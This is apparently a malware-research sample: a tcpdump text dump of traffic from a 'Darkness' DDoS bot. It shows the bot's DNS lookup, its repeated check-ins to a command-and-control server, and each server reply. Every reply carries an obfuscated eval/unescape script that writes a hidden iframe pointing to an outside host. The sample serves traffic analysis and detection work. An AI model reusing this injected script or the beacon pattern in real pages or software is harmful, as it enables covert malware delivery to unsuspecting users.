Darkness DDoS Malware Botnet PCAP Converted Traffic Sample

June 20, 2015

2011-01-17 16:39:20.442096 IP 172.16.3.27.1025 > 172.16.1.1.53: 28850+ A? vkotalke[.]info. (31)
E..;……………….5.’..p…………vkotalke[.]info…..
2011-01-17 16:39:21.439208 IP 172.16.3.27.1025 > 172.16.1.1.53: 28850+ A? vkotalke[.]info. (31)
E..;…….z………..5.’..p…………vkotalke[.]info…..
2011-01-17 16:39:21.538379 IP 172.16.1.1.53 > 172.16.3.27.1025: 28850* 1/0/0 A 195.189.226.193 (47)
E..K..@.@..e………5…7\.p…………vkotalke[.]info…………………
2011-01-17 16:39:21.541319 IP 172.16.1.1.53 > 172.16.3.27.1025: 28850* 1/0/0 A 195.189.226.193 (47)
E..K..@.@..e………5…7\.p…………vkotalke[.]info…………………
2011-01-17 16:39:21.548295 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [S], seq 1376765197, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…………….PR…….p……………
2011-01-17 16:39:22.290828 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [S.], seq 1691404055, ack 1376765198, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.5…………P..d…R…p……………
2011-01-17 16:39:22.290980 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….$………..PR…d…P………….
2011-01-17 16:39:22.291158 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [P.], seq 1:154, ack 1, win 65535, length 153
E…..@…………….PR…d…P…. ..GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:39:23.208331 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [.], ack 154, win 6432, length 0
E..(@.@.6…………P..d…R…P.. . ..
2011-01-17 16:39:23.214052 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [P.], seq 1:521, ack 154, win 6432, length 520
E..0@.@.6..}………P..d…R…P.. .K..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:39:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 318

d3Rm<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:39:23.214063 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [F.], seq 521, ack 154, win 6432, length 0
E..(@.@.6…………P..d.. R…P.. ….
2011-01-17 16:39:23.214290 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [.], ack 522, win 65015, length 0
E..(..@….”………..PR…d..!P….)……..
2011-01-17 16:39:23.216065 IP 172.16.3.27.1040 > 195.189.226.193.80: Flags [F.], seq 154, ack 522, win 65015, length 0
E..(..@….!………..PR…d..!P….(……..
2011-01-17 16:39:24.035849 IP 195.189.226.193.80 > 172.16.3.27.1040: Flags [.], ack 155, win 6432, length 0
E..(..@.6..%………P..d..!R…P.. ….
2011-01-17 16:39:54.204669 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [S], seq 176083077, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….p………..P
~……p…N………..
2011-01-17 16:39:54.962267 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [S.], seq 2195977977, ack 176083078, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P……
~..p……………
2011-01-17 16:39:54.962399 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….b………..P
~……P………….
2011-01-17 16:39:54.962564 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P
~……P…-`..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:39:55.756901 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [.], ack 152, win 6432, length 0
E..(b.@.6..u………P……
~..P.. ….
2011-01-17 16:39:55.759332 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,b.@.6..p………P……
~..P.. !…HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:39:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:39:55.759341 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(b.@.6..s………P……
~..P.. .)..
2011-01-17 16:39:55.759557 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@….<………..P
~……P….N……..
2011-01-17 16:39:55.759748 IP 172.16.3.27.1041 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@….;………..P
~……P….M……..
2011-01-17 16:39:56.614923 IP 195.189.226.193.80 > 172.16.3.27.1041: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P……
~..P.. .(..
2011-01-17 16:40:25.750397 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [S], seq 2963602687, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0
.@…………….P……..p…{n……….
2011-01-17 16:40:26.115682 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [S.], seq 2697242736, ack 2963602688, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…..p….p……………
2011-01-17 16:40:26.115809 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(
.@….!………..P…….qP…^………
2011-01-17 16:40:26.115943 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…
.@…………….P…….qP….f..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:40:26.503642 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [.], ack 152, win 6432, length 0
E..(..@.6…………P…..q….P.. E5..
2011-01-17 16:40:26.509388 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,..@.6…………P…..q….P.. ….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:40:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:40:26.509399 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(. @.6…………P…..u….P.. C0..
2011-01-17 16:40:26.509621 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(
.@…………….P…….vP…^T……..
2011-01-17 16:40:26.509804 IP 172.16.3.27.1042 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(
.@…………….P…….vP…^S……..
2011-01-17 16:40:26.938055 IP 195.189.226.193.80 > 172.16.3.27.1042: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…..v….P.. C/..
2011-01-17 16:40:56.500038 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [S], seq 3885989451, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.8@…………….P..~K….p….&……….
2011-01-17 16:40:57.099359 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [S.], seq 3183627503, ack 3885989452, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P….L…~Lp….5……….
2011-01-17 16:40:57.100604 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(.^@…………….P..~L..L.P….’……..
2011-01-17 16:40:57.100620 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…._@…./………..P..~L..L.P…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:40:57.839348 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [.], ack 152, win 6432, length 0
E..(.`@.6…………P….L…~.P.. .p..
2011-01-17 16:40:57.842892 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,.a@.6…………P….L…~.P.. .U..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:40:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:40:57.842902 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(.b@.6…………P….N…~.P.. .k..
2011-01-17 16:40:57.843119 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(.r@…………….P..~…N.P………….
2011-01-17 16:40:57.843304 IP 172.16.3.27.1043 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(.s@…………….P..~…N.P………….
2011-01-17 16:40:58.553905 IP 195.189.226.193.80 > 172.16.3.27.1043: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P….N…~.P.. .j..
2011-01-17 16:41:27.843515 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [S], seq 291733755, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….B………..P.c……p……………
2011-01-17 16:41:28.380701 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [S.], seq 3685198463, ack 291733756, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…….c..p….K……….
2011-01-17 16:41:28.380819 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….7………..P.c……P…=>……..
2011-01-17 16:41:28.380972 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P.c……P…i…GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:41:29.089950 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [.], ack 152, win 6432, length 0
E..(.I@.6…………P…….c..P.. #…
2011-01-17 16:41:29.096378 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,.J@.6…………P…….c..P.. hj..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:41:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:41:29.096390 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(.K@.6…………P…….c..P.. !…
2011-01-17 16:41:29.096606 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…………….P.c……P…<………
2011-01-17 16:41:29.096784 IP 172.16.3.27.1044 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@…………….P.c……P…<………
2011-01-17 16:41:29.852611 IP 195.189.226.193.80 > 172.16.3.27.1044: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…….c..P.. !…
2011-01-17 16:41:59.093181 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [S], seq 3306650629, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….(………..P..|…..p……………
2011-01-17 16:41:59.579926 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [S.], seq 4161845329, ack 3306650630, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P…..Q..|.p…!Q……….
2011-01-17 16:41:59.580044 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(. @…………….P..|….RP…dC……..
2011-01-17 16:41:59.580233 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E….
@…………….P..|….RP…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:42:00.153487 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [.], ack 152, win 6432, length 0
E..(|.@.6.rz………P…..R..|.P.. J…
2011-01-17 16:42:00.159343 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,|.@.6.pu………P…..R..|.P.. .x..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:42:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:42:00.159502 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(|.@.6.rx………P…..V..|.P.. H…
2011-01-17 16:42:00.159627 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…. ………..P..|….WP…c………
2011-01-17 16:42:00.159803 IP 172.16.3.27.1045 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@…………….P..|….WP…c………
2011-01-17 16:42:00.626905 IP 195.189.226.193.80 > 172.16.3.27.1045: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P…..W..|.P.. H…
2011-01-17 16:42:30.155435 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [S], seq 3733581295, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….9………..P……..p…\………..
2011-01-17 16:42:30.687017 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [S.], seq 362231731, ack 3733581296, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P….7…..p……………
2011-01-17 16:42:30.687137 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@…./………..P……7.P…;………
2011-01-17 16:42:30.687289 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….P……7.P…hx..GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:42:31.135078 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [.], ack 152, win 6432, length 0
E..(..@.6…………P….7…..P.. “G..
2011-01-17 16:42:31.138535 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,..@.6…………P….7…..P.. e1..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:42:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:42:31.138624 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(..@.6…………P….9…..P.. B..
2011-01-17 16:42:31.138781 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@…………….P……9.P…;f……..
2011-01-17 16:42:31.138983 IP 172.16.3.27.1046 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(. @…………….P……9.P…;e……..
2011-01-17 16:42:31.639012 IP 195.189.226.193.80 > 172.16.3.27.1046: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P….9…..P.. A..
2011-01-17 16:43:01.139540 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [S], seq 1765697681, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….r………..Pi>h…..p…W>……….
2011-01-17 16:43:01.745576 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [S.], seq 848267084, ack 1765697682, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P..2..Li>h.p….#……….
2011-01-17 16:43:01.745710 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(..@….h………..Pi>h.2..MP………….
2011-01-17 16:43:01.745851 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…..@…………….Pi>h.2..MP…….GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:43:02.339262 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [.], ack 152, win 6432, length 0
E..(Z.@.6…………P..2..Mi>i)P.. .^..
2011-01-17 16:43:02.344748 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,Z.@.6…………P..2..Mi>i)P.. .G..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:43:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
2011-01-17 16:43:02.344761 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [F.], seq 517, ack 152, win 6432, length 0
E..(Z.@.6…………P..2..Qi>i)P.. .Y..
2011-01-17 16:43:02.344973 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [.], ack 518, win 65019, length 0
E..(..@….V………..Pi>i)2..RP….}……..
2011-01-17 16:43:02.345146 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(..@….U………..Pi>i)2..RP….|……..
2011-01-17 16:43:05.278196 IP 172.16.3.27.1047 > 195.189.226.193.80: Flags [F.], seq 152, ack 518, win 65019, length 0
E..(.1@…………….Pi>i)2..RP….|……..
2011-01-17 16:43:05.767282 IP 195.189.226.193.80 > 172.16.3.27.1047: Flags [.], ack 153, win 6432, length 0
E..(..@.6..%………P..2..Ri>i*P.. .X..
2011-01-17 16:43:32.344982 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [S], seq 764278873, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0”.@…………….P-..Y….p….&……….
2011-01-17 16:43:32.845359 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [S.], seq 1329512255, ack 764278874, win 5840, options [mss 1298,nop,nop,sackOK], length 0
E..0..@.6…………P..O>.?-..Zp….h……….
2011-01-17 16:43:32.845479 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [.], ack 1, win 65535, length 0
E..(“.@…………….P-..ZO>.@P…![……..
2011-01-17 16:43:32.845659 IP 172.16.3.27.1048 > 195.189.226.193.80: Flags [P.], seq 1:152, ack 1, win 65535, length 151
E…”.@…………….P-..ZO>.@P…M…GET /index.php?uid=587609&ver=8g*XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke[.]info
Pragma: no-cache
2011-01-17 16:43:33.318859 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [.], ack 152, win 6432, length 0
E..(V(@.6…………P..O>.@-…P.. ….
2011-01-17 16:43:33.324405 IP 195.189.226.193.80 > 172.16.3.27.1048: Flags [P.], seq 1:517, ack 152, win 6432, length 516
E..,V)@.6…………P..O>.@-…P.. I…HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 17 Jan 2011 20:43:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Vary: Accept-Encoding
Content-Length: 314

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%73%72%75%70%2E%63%6F%6D%2F%3F%31%38%34%33%36%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
